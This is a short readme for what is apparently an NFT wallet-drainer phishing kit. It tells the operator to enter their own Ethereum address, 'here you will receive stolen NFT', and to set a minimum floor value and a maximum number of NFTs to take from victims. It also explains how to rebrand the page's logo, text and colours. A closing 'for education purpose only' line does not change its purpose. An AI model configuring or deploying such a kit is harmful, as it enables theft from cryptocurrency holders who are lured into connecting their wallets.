{\rtf1\ansi\ansicpg1252\cocoartf2513
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\paperw11900\paperh16840\margl1440\margr1440\vieww10800\viewh8400\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f0\fs24 \cf0 Open index.js (visual code / text editor) and change it to your own.\
\
1. \
\
const receiveAddress = "0x0000000000000000000000000000000000000000", // Your wallet (ETH) - here you will receive stolen NFT\
\
2. \
\
minValue: 0.1, // Minimum value of NFTs (it will take minimum floor value from OpenSea)\
\
maxTransfer: 4 // Minimum transfers of NFTs (if there is 8 NFTs for example with value 0.1 and more, it will take best 4 of them)\
\
Edit logo and gif / img / video - just rename new file \'93same\'94 as original.\
\
Colours and text - index.html (change desired info)\
\
\'97\'97\'97\'97\'97\
\
Script can be used to any webpage design\
For education purpose only\
\
}